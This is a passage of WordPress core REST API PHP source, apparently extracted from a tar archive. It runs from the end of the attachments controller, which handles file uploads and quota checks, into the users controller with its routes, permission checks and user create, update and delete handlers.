'description' => __( 'URL to the original attachment file.' ),
'type' => 'string',
'format' => 'uri',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
);
unset( $schema['properties']['password'] );
return $schema;
}
/**
* Handles an upload via raw POST data.
*
* @since 4.7.0
*
* @param array $data Supplied file data.
* @param array $headers HTTP headers from the request.
* @return array|WP_Error Data from wp_handle_sideload().
*/
protected function upload_from_data( $data, $headers ) {
if ( empty( $data ) ) {
return new WP_Error( 'rest_upload_no_data', __( 'No data supplied.' ), array( 'status' => 400 ) );
}
if ( empty( $headers['content_type'] ) ) {
return new WP_Error( 'rest_upload_no_content_type', __( 'No Content-Type supplied.' ), array( 'status' => 400 ) );
}
if ( empty( $headers['content_disposition'] ) ) {
return new WP_Error( 'rest_upload_no_content_disposition', __( 'No Content-Disposition supplied.' ), array( 'status' => 400 ) );
}
$filename = self::get_filename_from_disposition( $headers['content_disposition'] );
if ( empty( $filename ) ) {
return new WP_Error( 'rest_upload_invalid_disposition', __( 'Invalid Content-Disposition supplied. Content-Disposition needs to be formatted as `attachment; filename="image.png"` or similar.' ), array( 'status' => 400 ) );
}
if ( ! empty( $headers['content_md5'] ) ) {
$content_md5 = array_shift( $headers['content_md5'] );
$expected = trim( $content_md5 );
$actual = md5( $data );
if ( $expected !== $actual ) {
return new WP_Error( 'rest_upload_hash_mismatch', __( 'Content hash did not match expected.' ), array( 'status' => 412 ) );
}
}
// Get the content-type.
$type = array_shift( $headers['content_type'] );
/** Include admin functions to get access to wp_tempnam() and wp_handle_sideload(). */
require_once ABSPATH . 'wp-admin/includes/file.php';
// Save the file.
$tmpfname = wp_tempnam( $filename );
$fp = fopen( $tmpfname, 'w+' );
if ( ! $fp ) {
return new WP_Error( 'rest_upload_file_error', __( 'Could not open file handle.' ), array( 'status' => 500 ) );
}
fwrite( $fp, $data );
fclose( $fp );
// Now, sideload it in.
$file_data = array(
'error' => null,
'tmp_name' => $tmpfname,
'name' => $filename,
'type' => $type,
);
$size_check = self::check_upload_size( $file_data );
if ( is_wp_error( $size_check ) ) {
return $size_check;
}
$overrides = array(
'test_form' => false,
);
$sideloaded = wp_handle_sideload( $file_data, $overrides );
if ( isset( $sideloaded['error'] ) ) {
@unlink( $tmpfname );
return new WP_Error( 'rest_upload_sideload_error', $sideloaded['error'], array( 'status' => 500 ) );
}
return $sideloaded;
}
/**
* Parses filename from a Content-Disposition header value.
*
* As per RFC6266:
*
* content-disposition = "Content-Disposition" ":"
* disposition-type *( ";" disposition-parm )
*
* disposition-type = "inline" | "attachment" | disp-ext-type
* ; case-insensitive
* disp-ext-type = token
*
* disposition-parm = filename-parm | disp-ext-parm
*
* filename-parm = "filename" "=" value
* | "filename*" "=" ext-value
*
* disp-ext-parm = token "=" value
* | ext-token "=" ext-value
* ext-token = <the characters in token, followed by "*">
*
* @since 4.7.0
*
* @link http://tools.ietf.org/html/rfc2388
* @link http://tools.ietf.org/html/rfc6266
*
* @param string[] $disposition_header List of Content-Disposition header values.
* @return string|null Filename if available, or null if not found.
*/
public static function get_filename_from_disposition( $disposition_header ) {
// Get the filename.
$filename = null;
foreach ( $disposition_header as $value ) {
$value = trim( $value );
if ( strpos( $value, ';' ) === false ) {
continue;
}
list( $type, $attr_parts ) = explode( ';', $value, 2 );
$attr_parts = explode( ';', $attr_parts );
$attributes = array();
foreach ( $attr_parts as $part ) {
if ( strpos( $part, '=' ) === false ) {
continue;
}
list( $key, $value ) = explode( '=', $part, 2 );
$attributes[ trim( $key ) ] = trim( $value );
}
if ( empty( $attributes['filename'] ) ) {
continue;
}
$filename = trim( $attributes['filename'] );
// Unquote quoted filename, but after trimming.
if ( substr( $filename, 0, 1 ) === '"' && substr( $filename, -1, 1 ) === '"' ) {
$filename = substr( $filename, 1, -1 );
}
}
return $filename;
}
/**
* Retrieves the query params for collections of attachments.
*
* @since 4.7.0
*
* @return array Query parameters for the attachment collection as an array.
*/
public function get_collection_params() {
$params = parent::get_collection_params();
$params['status']['default'] = 'inherit';
$params['status']['items']['enum'] = array( 'inherit', 'private', 'trash' );
$media_types = $this->get_media_types();
$params['media_type'] = array(
'default' => null,
'description' => __( 'Limit result set to attachments of a particular media type.' ),
'type' => 'string',
'enum' => array_keys( $media_types ),
);
$params['mime_type'] = array(
'default' => null,
'description' => __( 'Limit result set to attachments of a particular MIME type.' ),
'type' => 'string',
);
return $params;
}
/**
* Validates whether the user can query private statuses.
*
* @since 4.7.0
*
* @param mixed $value Status value.
* @param WP_REST_Request $request Request object.
* @param string $parameter Additional parameter to pass for validation.
* @return WP_Error|bool True if the user may query, WP_Error if not.
*/
public function validate_user_can_query_private_statuses( $value, $request, $parameter ) {
if ( 'inherit' === $value ) {
return true;
}
return parent::validate_user_can_query_private_statuses( $value, $request, $parameter );
}
/**
* Handles an upload via multipart/form-data ($_FILES).
*
* @since 4.7.0
*
* @param array $files Data from the `$_FILES` superglobal.
* @param array $headers HTTP headers from the request.
* @return array|WP_Error Data from wp_handle_upload().
*/
protected function upload_from_file( $files, $headers ) {
if ( empty( $files ) ) {
return new WP_Error( 'rest_upload_no_data', __( 'No data supplied.' ), array( 'status' => 400 ) );
}
// Verify hash, if given.
if ( ! empty( $headers['content_md5'] ) ) {
$content_md5 = array_shift( $headers['content_md5'] );
$expected = trim( $content_md5 );
$actual = md5_file( $files['file']['tmp_name'] );
if ( $expected !== $actual ) {
return new WP_Error( 'rest_upload_hash_mismatch', __( 'Content hash did not match expected.' ), array( 'status' => 412 ) );
}
}
// Pass off to WP to handle the actual upload.
$overrides = array(
'test_form' => false,
);
// Bypasses is_uploaded_file() when running unit tests.
if ( defined( 'DIR_TESTDATA' ) && DIR_TESTDATA ) {
$overrides['action'] = 'wp_handle_mock_upload';
}
$size_check = self::check_upload_size( $files['file'] );
if ( is_wp_error( $size_check ) ) {
return $size_check;
}
/** Include admin function to get access to wp_handle_upload(). */
require_once ABSPATH . 'wp-admin/includes/file.php';
$file = wp_handle_upload( $files['file'], $overrides );
if ( isset( $file['error'] ) ) {
return new WP_Error( 'rest_upload_unknown_error', $file['error'], array( 'status' => 500 ) );
}
return $file;
}
/**
* Retrieves the supported media types.
*
* Media types are considered the MIME type category.
*
* @since 4.7.0
*
* @return array Array of supported media types.
*/
protected function get_media_types() {
$media_types = array();
foreach ( get_allowed_mime_types() as $mime_type ) {
$parts = explode( '/', $mime_type );
if ( ! isset( $media_types[ $parts[0] ] ) ) {
$media_types[ $parts[0] ] = array();
}
$media_types[ $parts[0] ][] = $mime_type;
}
return $media_types;
}
/**
* Determine if uploaded file exceeds space quota on multisite.
*
* Replicates check_upload_size().
*
* @since 4.9.8
*
* @param array $file $_FILES array for a given file.
* @return true|WP_Error True if can upload, error for errors.
*/
protected function check_upload_size( $file ) {
if ( ! is_multisite() ) {
return true;
}
if ( get_site_option( 'upload_space_check_disabled' ) ) {
return true;
}
$space_left = get_upload_space_available();
$file_size = filesize( $file['tmp_name'] );
if ( $space_left < $file_size ) {
/* translators: %s: required disk space in kilobytes */
return new WP_Error( 'rest_upload_limited_space', sprintf( __( 'Not enough space to upload. %s KB needed.' ), number_format( ( $file_size - $space_left ) / KB_IN_BYTES ) ), array( 'status' => 400 ) );
}
if ( $file_size > ( KB_IN_BYTES * get_site_option( 'fileupload_maxk', 1500 ) ) ) {
/* translators: %s: maximum allowed file size in kilobytes */
return new WP_Error( 'rest_upload_file_too_big', sprintf( __( 'This file is too big. Files must be less than %s KB in size.' ), get_site_option( 'fileupload_maxk', 1500 ) ), array( 'status' => 400 ) );
}
// Include admin function to get access to upload_is_user_over_quota().
require_once ABSPATH . 'wp-admin/includes/ms.php';
if ( upload_is_user_over_quota( false ) ) {
return new WP_Error( 'rest_upload_user_quota_exceeded', __( 'You have used your space quota. Please delete files before uploading.' ), array( 'status' => 400 ) );
}
return true;
}
}
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/class-wp-rest-users-controller.php��������������������������������������������������������0000666�����������������00000130336�15111427772�0015325 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Users_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class used to manage users via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Controller
*/
class WP_REST_Users_Controller extends WP_REST_Controller {
/**
* Instance of a user meta fields object.
*
* @since 4.7.0
* @var WP_REST_User_Meta_Fields
*/
protected $meta;
/**
* Constructor.
*
* @since 4.7.0
*/
public function __construct() {
$this->namespace = 'wp/v2';
$this->rest_base = 'users';
$this->meta = new WP_REST_User_Meta_Fields();
}
/**
* Registers the routes for the objects of the controller.
*
* @since 4.7.0
*
* @see register_rest_route()
*/
public function register_routes() {
register_rest_route( $this->namespace, '/' . $this->rest_base, array(
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_items' ),
'permission_callback' => array( $this, 'get_items_permissions_check' ),
'args' => $this->get_collection_params(),
),
array(
'methods' => WP_REST_Server::CREATABLE,
'callback' => array( $this, 'create_item' ),
'permission_callback' => array( $this, 'create_item_permissions_check' ),
'args' => $this->get_endpoint_args_for_item_schema( WP_REST_Server::CREATABLE ),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
register_rest_route( $this->namespace, '/' . $this->rest_base . '/(?P<id>[\d]+)', array(
'args' => array(
'id' => array(
'description' => __( 'Unique identifier for the user.' ),
'type' => 'integer',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_item' ),
'permission_callback' => array( $this, 'get_item_permissions_check' ),
'args' => array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
),
),
array(
'methods' => WP_REST_Server::EDITABLE,
'callback' => array( $this, 'update_item' ),
'permission_callback' => array( $this, 'update_item_permissions_check' ),
'args' => $this->get_endpoint_args_for_item_schema( WP_REST_Server::EDITABLE ),
),
array(
'methods' => WP_REST_Server::DELETABLE,
'callback' => array( $this, 'delete_item' ),
'permission_callback' => array( $this, 'delete_item_permissions_check' ),
'args' => array(
'force' => array(
'type' => 'boolean',
'default' => false,
'description' => __( 'Required to be true, as users do not support trashing.' ),
),
'reassign' => array(
'type' => 'integer',
'description' => __( 'Reassign the deleted user\'s posts and links to this user ID.' ),
'required' => true,
'sanitize_callback' => array( $this, 'check_reassign' ),
),
),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
register_rest_route( $this->namespace, '/' . $this->rest_base . '/me', array(
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_current_item' ),
'args' => array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
),
),
array(
'methods' => WP_REST_Server::EDITABLE,
'callback' => array( $this, 'update_current_item' ),
'permission_callback' => array( $this, 'update_current_item_permissions_check' ),
'args' => $this->get_endpoint_args_for_item_schema( WP_REST_Server::EDITABLE ),
),
array(
'methods' => WP_REST_Server::DELETABLE,
'callback' => array( $this, 'delete_current_item' ),
'permission_callback' => array( $this, 'delete_current_item_permissions_check' ),
'args' => array(
'force' => array(
'type' => 'boolean',
'default' => false,
'description' => __( 'Required to be true, as users do not support trashing.' ),
),
'reassign' => array(
'type' => 'integer',
'description' => __( 'Reassign the deleted user\'s posts and links to this user ID.' ),
'required' => true,
'sanitize_callback' => array( $this, 'check_reassign' ),
),
),
),
'schema' => array( $this, 'get_public_item_schema' ),
));
}
/**
* Checks for a valid value for the reassign parameter when deleting users.
*
* The value can be an integer, 'false', false, or ''.
*
* @since 4.7.0
*
* @param int|bool $value The value passed to the reassign parameter.
* @param WP_REST_Request $request Full details about the request.
* @param string $param The parameter that is being sanitized.
*
* @return int|bool|WP_Error
*/
public function check_reassign( $value, $request, $param ) {
if ( is_numeric( $value ) ) {
return $value;
}
if ( empty( $value ) || false === $value || 'false' === $value ) {
return false;
}
return new WP_Error( 'rest_invalid_param', __( 'Invalid user parameter(s).' ), array( 'status' => 400 ) );
}
/**
* Permissions check for getting all users.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has read access, otherwise WP_Error object.
*/
public function get_items_permissions_check( $request ) {
// Check if roles is specified in GET request and if user can list users.
if ( ! empty( $request['roles'] ) && ! current_user_can( 'list_users' ) ) {
return new WP_Error( 'rest_user_cannot_view', __( 'Sorry, you are not allowed to filter users by role.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( 'edit' === $request['context'] && ! current_user_can( 'list_users' ) ) {
return new WP_Error( 'rest_forbidden_context', __( 'Sorry, you are not allowed to edit users.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( in_array( $request['orderby'], array( 'email', 'registered_date' ), true ) && ! current_user_can( 'list_users' ) ) {
return new WP_Error( 'rest_forbidden_orderby', __( 'Sorry, you are not allowed to order users by this parameter.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( 'authors' === $request['who'] ) {
$can_view = false;
$types = get_post_types( array( 'show_in_rest' => true ), 'objects' );
foreach ( $types as $type ) {
if ( post_type_supports( $type->name, 'author' )
&& current_user_can( $type->cap->edit_posts ) ) {
$can_view = true;
}
}
if ( ! $can_view ) {
return new WP_Error( 'rest_forbidden_who', __( 'Sorry, you are not allowed to query users by this parameter.' ), array( 'status' => rest_authorization_required_code() ) );
}
}
return true;
}
/**
* Retrieves all users.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_items( $request ) {
// Retrieve the list of registered collection query parameters.
$registered = $this->get_collection_params();
/*
* This array defines mappings between public API query parameters whose
* values are accepted as-passed, and their internal WP_Query parameter
* name equivalents (some are the same). Only values which are also
* present in $registered will be set.
*/
$parameter_mappings = array(
'exclude' => 'exclude',
'include' => 'include',
'order' => 'order',
'per_page' => 'number',
'search' => 'search',
'roles' => 'role__in',
'slug' => 'nicename__in',
);
$prepared_args = array();
/*
* For each known parameter which is both registered and present in the request,
* set the parameter's value on the query $prepared_args.
*/
foreach ( $parameter_mappings as $api_param => $wp_param ) {
if ( isset( $registered[ $api_param ], $request[ $api_param ] ) ) {
$prepared_args[ $wp_param ] = $request[ $api_param ];
}
}
if ( isset( $registered['offset'] ) && ! empty( $request['offset'] ) ) {
$prepared_args['offset'] = $request['offset'];
} else {
$prepared_args['offset'] = ( $request['page'] - 1 ) * $prepared_args['number'];
}
if ( isset( $registered['orderby'] ) ) {
$orderby_possibles = array(
'id' => 'ID',
'include' => 'include',
'name' => 'display_name',
'registered_date' => 'registered',
'slug' => 'user_nicename',
'include_slugs' => 'nicename__in',
'email' => 'user_email',
'url' => 'user_url',
);
$prepared_args['orderby'] = $orderby_possibles[ $request['orderby'] ];
}
if ( isset( $registered['who'] ) && ! empty( $request['who'] ) && 'authors' === $request['who'] ) {
$prepared_args['who'] = 'authors';
} elseif ( ! current_user_can( 'list_users' ) ) {
$prepared_args['has_published_posts'] = get_post_types( array( 'show_in_rest' => true ), 'names' );
}
if ( ! empty( $prepared_args['search'] ) ) {
if ( ! current_user_can( 'list_users' ) ) {
$prepared_args['search_columns'] = array( 'ID', 'user_login', 'user_nicename', 'display_name' );
}
$prepared_args['search'] = '*' . $prepared_args['search'] . '*';
}
/**
* Filters WP_User_Query arguments when querying users via the REST API.
*
* @link https://developer.wordpress.org/reference/classes/wp_user_query/
*
* @since 4.7.0
*
* @param array $prepared_args Array of arguments for WP_User_Query.
* @param WP_REST_Request $request The current request.
*/
$prepared_args = apply_filters( 'rest_user_query', $prepared_args, $request );
$query = new WP_User_Query( $prepared_args );
$users = array();
foreach ( $query->results as $user ) {
if ( 'edit' === $request['context'] && ! current_user_can( 'edit_user', $user->ID ) ) {
continue;
}
$data = $this->prepare_item_for_response( $user, $request );
$users[] = $this->prepare_response_for_collection( $data );
}
$response = rest_ensure_response( $users );
// Store pagination values for headers then unset for count query.
$per_page = (int) $prepared_args['number'];
$page = ceil( ( ( (int) $prepared_args['offset'] ) / $per_page ) + 1 );
$prepared_args['fields'] = 'ID';
$total_users = $query->get_total();
if ( $total_users < 1 ) {
// Out-of-bounds, run the query again without LIMIT for total count.
unset( $prepared_args['number'], $prepared_args['offset'] );
$count_query = new WP_User_Query( $prepared_args );
$total_users = $count_query->get_total();
}
$response->header( 'X-WP-Total', (int) $total_users );
$max_pages = ceil( $total_users / $per_page );
$response->header( 'X-WP-TotalPages', (int) $max_pages );
$base = add_query_arg( $request->get_query_params(), rest_url( sprintf( '%s/%s', $this->namespace, $this->rest_base ) ) );
if ( $page > 1 ) {
$prev_page = $page - 1;
if ( $prev_page > $max_pages ) {
$prev_page = $max_pages;
}
$prev_link = add_query_arg( 'page', $prev_page, $base );
$response->link_header( 'prev', $prev_link );
}
if ( $max_pages > $page ) {
$next_page = $page + 1;
$next_link = add_query_arg( 'page', $next_page, $base );
$response->link_header( 'next', $next_link );
}
return $response;
}
/**
* Get the user, if the ID is valid.
*
* @since 4.7.2
*
* @param int $id Supplied ID.
* @return WP_User|WP_Error True if ID is valid, WP_Error otherwise.
*/
protected function get_user( $id ) {
$error = new WP_Error( 'rest_user_invalid_id', __( 'Invalid user ID.' ), array( 'status' => 404 ) );
if ( (int) $id <= 0 ) {
return $error;
}
$user = get_userdata( (int) $id );
if ( empty( $user ) || ! $user->exists() ) {
return $error;
}
if ( is_multisite() && ! is_user_member_of_blog( $user->ID ) ) {
return $error;
}
return $user;
}
/**
* Checks if a given request has access to read a user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has read access for the item, otherwise WP_Error object.
*/
public function get_item_permissions_check( $request ) {
$user = $this->get_user( $request['id'] );
if ( is_wp_error( $user ) ) {
return $user;
}
$types = get_post_types( array( 'show_in_rest' => true ), 'names' );
if ( get_current_user_id() === $user->ID ) {
return true;
}
if ( 'edit' === $request['context'] && ! current_user_can( 'edit_user', $user->ID ) ) {
return new WP_Error( 'rest_forbidden_context', __( 'Sorry, you are not allowed to edit this user.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( ! current_user_can( 'edit_user', $user->ID ) && ! current_user_can( 'list_users' ) && ! count_user_posts( $user->ID, $types ) ) {
return new WP_Error( 'rest_user_cannot_view', __( 'Sorry, you are not allowed to list users.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Retrieves a single user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_item( $request ) {
$user = $this->get_user( $request['id'] );
if ( is_wp_error( $user ) ) {
return $user;
}
$user = $this->prepare_item_for_response( $user, $request );
$response = rest_ensure_response( $user );
return $response;
}
/**
* Retrieves the current user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_current_item( $request ) {
$current_user_id = get_current_user_id();
if ( empty( $current_user_id ) ) {
return new WP_Error( 'rest_not_logged_in', __( 'You are not currently logged in.' ), array( 'status' => 401 ) );
}
$user = wp_get_current_user();
$response = $this->prepare_item_for_response( $user, $request );
$response = rest_ensure_response( $response );
return $response;
}
/**
* Checks if a given request has access create users.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has access to create items, WP_Error object otherwise.
*/
public function create_item_permissions_check( $request ) {
if ( ! current_user_can( 'create_users' ) ) {
return new WP_Error( 'rest_cannot_create_user', __( 'Sorry, you are not allowed to create new users.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Creates a single user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function create_item( $request ) {
if ( ! empty( $request['id'] ) ) {
return new WP_Error( 'rest_user_exists', __( 'Cannot create existing user.' ), array( 'status' => 400 ) );
}
$schema = $this->get_item_schema();
if ( ! empty( $request['roles'] ) && ! empty( $schema['properties']['roles'] ) ) {
$check_permission = $this->check_role_update( $request['id'], $request['roles'] );
if ( is_wp_error( $check_permission ) ) {
return $check_permission;
}
}
$user = $this->prepare_item_for_database( $request );
if ( is_multisite() ) {
$ret = wpmu_validate_user_signup( $user->user_login, $user->user_email );
if ( is_wp_error( $ret['errors'] ) && ! empty( $ret['errors']->errors ) ) {
$error = new WP_Error( 'rest_invalid_param', __( 'Invalid user parameter(s).' ), array( 'status' => 400 ) );
foreach ( $ret['errors']->errors as $code => $messages ) {
foreach ( $messages as $message ) {
$error->add( $code, $message );
}
if ( $error_data = $error->get_error_data( $code ) ) {
$error->add_data( $error_data, $code );
}
}
return $error;
}
}
if ( is_multisite() ) {
$user_id = wpmu_create_user( $user->user_login, $user->user_pass, $user->user_email );
if ( ! $user_id ) {
return new WP_Error( 'rest_user_create', __( 'Error creating new user.' ), array( 'status' => 500 ) );
}
$user->ID = $user_id;
$user_id = wp_update_user( wp_slash( (array) $user ) );
if ( is_wp_error( $user_id ) ) {
return $user_id;
}
$result= add_user_to_blog( get_site()->id, $user_id, '' );
if ( is_wp_error( $result ) ) {
return $result;
}
} else {
$user_id = wp_insert_user( wp_slash( (array) $user ) );
if ( is_wp_error( $user_id ) ) {
return $user_id;
}
}
$user = get_user_by( 'id', $user_id );
/**
* Fires immediately after a user is created or updated via the REST API.
*
* @since 4.7.0
*
* @param WP_User $user Inserted or updated user object.
* @param WP_REST_Request $request Request object.
* @param bool $creating True when creating a user, false when updating.
*/
do_action( 'rest_insert_user', $user, $request, true );
if ( ! empty( $request['roles'] ) && ! empty( $schema['properties']['roles'] ) ) {
array_map( array( $user, 'add_role' ), $request['roles'] );
}
if ( ! empty( $schema['properties']['meta'] ) && isset( $request['meta'] ) ) {
$meta_update = $this->meta->update_value( $request['meta'], $user_id );
if ( is_wp_error( $meta_update ) ) {
return $meta_update;
}
}
$user = get_user_by( 'id', $user_id );
$fields_update = $this->update_additional_fields_for_object( $user, $request );
if ( is_wp_error( $fields_update ) ) {
return $fields_update;
}
$request->set_param( 'context', 'edit' );
/**
* Fires after a user is completely created or updated via the REST API.
*
* @since 5.0.0
*
* @param WP_User $user Inserted or updated user object.
* @param WP_REST_Request $request Request object.
* @param bool $creating True when creating a user, false when updating.
*/
do_action( 'rest_after_insert_user', $user, $request, true );
$response = $this->prepare_item_for_response( $user, $request );
$response = rest_ensure_response( $response );
$response->set_status( 201 );
$response->header( 'Location', rest_url( sprintf( '%s/%s/%d', $this->namespace, $this->rest_base, $user_id ) ) );
return $response;
}
/**
* Checks if a given request has access to update a user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has access to update the item, WP_Error object otherwise.
*/
public function update_item_permissions_check( $request ) {
$user = $this->get_user( $request['id'] );
if ( is_wp_error( $user ) ) {
return $user;
}
if ( ! empty( $request['roles'] ) ) {
if ( ! current_user_can( 'promote_user', $user->ID ) ) {
return new WP_Error( 'rest_cannot_edit_roles', __( 'Sorry, you are not allowed to edit roles of this user.' ), array( 'status' => rest_authorization_required_code() ) );
}
$request_params = array_keys( $request->get_params() );
sort( $request_params );
// If only 'id' and 'roles' are specified (we are only trying to
// edit roles), then only the 'promote_user' cap is required.
if ( $request_params === array( 'id', 'roles' ) ) {
return true;
}
}
if ( ! current_user_can( 'edit_user', $user->ID ) ) {
return new WP_Error( 'rest_cannot_edit', __( 'Sorry, you are not allowed to edit this user.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Updates a single user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function update_item( $request ) {
$user = $this->get_user( $request['id'] );
if ( is_wp_error( $user ) ) {
return $user;
}
$id = $user->ID;
if ( ! $user ) {
return new WP_Error( 'rest_user_invalid_id', __( 'Invalid user ID.' ), array( 'status' => 404 ) );
}
if ( email_exists( $request['email'] ) && $request['email'] !== $user->user_email ) {
return new WP_Error( 'rest_user_invalid_email', __( 'Invalid email address.' ), array( 'status' => 400 ) );
}
if ( ! empty( $request['username'] ) && $request['username'] !== $user->user_login ) {
return new WP_Error( 'rest_user_invalid_argument', __( "Username isn't editable." ), array( 'status' => 400 ) );
}
if ( ! empty( $request['slug'] ) && $request['slug'] !== $user->user_nicename && get_user_by( 'slug', $request['slug'] ) ) {
return new WP_Error( 'rest_user_invalid_slug', __( 'Invalid slug.' ), array( 'status' => 400 ) );
}
if ( ! empty( $request['roles'] ) ) {
$check_permission = $this->check_role_update( $id, $request['roles'] );
if ( is_wp_error( $check_permission ) ) {
return $check_permission;
}
}
$user = $this->prepare_item_for_database( $request );
// Ensure we're operating on the same user we already checked.
$user->ID = $id;
$user_id = wp_update_user( wp_slash( (array) $user ) );
if ( is_wp_error( $user_id ) ) {
return $user_id;
}
$user = get_user_by( 'id', $user_id );
/** This action is documented in wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php */
do_action( 'rest_insert_user', $user, $request, false );
if ( ! empty( $request['roles'] ) ) {
array_map( array( $user, 'add_role' ), $request['roles'] );
}
$schema = $this->get_item_schema();
if ( ! empty( $schema['properties']['meta'] ) && isset( $request['meta'] ) ) {
$meta_update = $this->meta->update_value( $request['meta'], $id );
if ( is_wp_error( $meta_update ) ) {
return $meta_update;
}
}
$user = get_user_by( 'id', $user_id );
$fields_update = $this->update_additional_fields_for_object( $user, $request );
if ( is_wp_error( $fields_update ) ) {
return $fields_update;
}
$request->set_param( 'context', 'edit' );
/** This action is documented in wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php */
do_action( 'rest_after_insert_user', $user, $request, false );
$response = $this->prepare_item_for_response( $user, $request );
$response = rest_ensure_response( $response );
return $response;
}
/**
* Checks if a given request has access to update the current user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has access to update the item, WP_Error object otherwise.
*/
public function update_current_item_permissions_check( $request ) {
$request['id'] = get_current_user_id();
return $this->update_item_permissions_check( $request );
}
/**
* Updates the current user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
function update_current_item( $request ) {
$request['id'] = get_current_user_id();
return $this->update_item( $request );
}
/**
* Checks if a given request has access delete a user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has access to delete the item, WP_Error object otherwise.
*/
public function delete_item_permissions_check( $request ) {
$user = $this->get_user( $request['id'] );
if ( is_wp_error( $user ) ) {
return $user;
}
if ( ! current_user_can( 'delete_user', $user->ID ) ) {
return new WP_Error( 'rest_user_cannot_delete', __( 'Sorry, you are not allowed to delete this user.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Deletes a single user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function delete_item( $request ) {
// We don't support delete requests in multisite.
if ( is_multisite() ) {
return new WP_Error( 'rest_cannot_delete', __( 'The user cannot be deleted.' ), array( 'status' => 501 ) );
}
$user = $this->get_user( $request['id'] );
if ( is_wp_error( $user ) ) {
return $user;
}
$id = $user->ID;
$reassign = false === $request['reassign'] ? null : absint( $request['reassign'] );
$force = isset( $request['force'] ) ? (bool) $request['force'] : false;
// We don't support trashing for users.
if ( ! $force ) {
/* translators: %s: force=true */
return new WP_Error( 'rest_trash_not_supported', sprintf( __( "Users do not support trashing. Set '%s' to delete." ), 'force=true' ), array( 'status' => 501 ) );
}
if ( ! empty( $reassign ) ) {
if ( $reassign === $id || ! get_userdata( $reassign ) ) {
return new WP_Error( 'rest_user_invalid_reassign', __( 'Invalid user ID for reassignment.' ), array( 'status' => 400 ) );
}
}
$request->set_param( 'context', 'edit' );
$previous = $this->prepare_item_for_response( $user, $request );
/** Include admin user functions to get access to wp_delete_user() */
require_once ABSPATH . 'wp-admin/includes/user.php';
$result = wp_delete_user( $id, $reassign );
if ( ! $result ) {
return new WP_Error( 'rest_cannot_delete', __( 'The user cannot be deleted.' ), array( 'status' => 500 ) );
}
$response = new WP_REST_Response();
$response->set_data( array( 'deleted' => true, 'previous' => $previous->get_data() ) );
/**
* Fires immediately after a user is deleted via the REST API.
*
* @since 4.7.0
*
* @param WP_User $user The user data.
* @param WP_REST_Response $response The response returned from the API.
* @param WP_REST_Request $request The request sent to the API.
*/
do_action( 'rest_delete_user', $user, $response, $request );
return $response;
}
/**
* Checks if a given request has access to delete the current user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has access to delete the item, WP_Error object otherwise.
*/
public function delete_current_item_permissions_check( $request ) {
$request['id'] = get_current_user_id();
return $this->delete_item_permissions_check( $request );
}
/**
* Deletes the current user.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
function delete_current_item( $request ) {
$request['id'] = get_current_user_id();
return $this->delete_item( $request );
}
/**
* Prepares a single user output for response.
*
* @since 4.7.0
*
* @param WP_User $user User object.
* @param WP_REST_Request $request Request object.
* @return WP_REST_Response Response object.
*/
public function prepare_item_for_response( $user, $request ) {
$data = array();
$fields = $this->get_fields_for_response( $request );
if ( in_array( 'id', $fields, true ) ) {
$data['id'] = $user->ID;
}
if ( in_array( 'username', $fields, true ) ) {
$data['username'] = $user->user_login;
}
if ( in_array( 'name', $fields, true ) ) {
$data['name'] = $user->display_name;
}
if ( in_array( 'first_name', $fields, true ) ) {
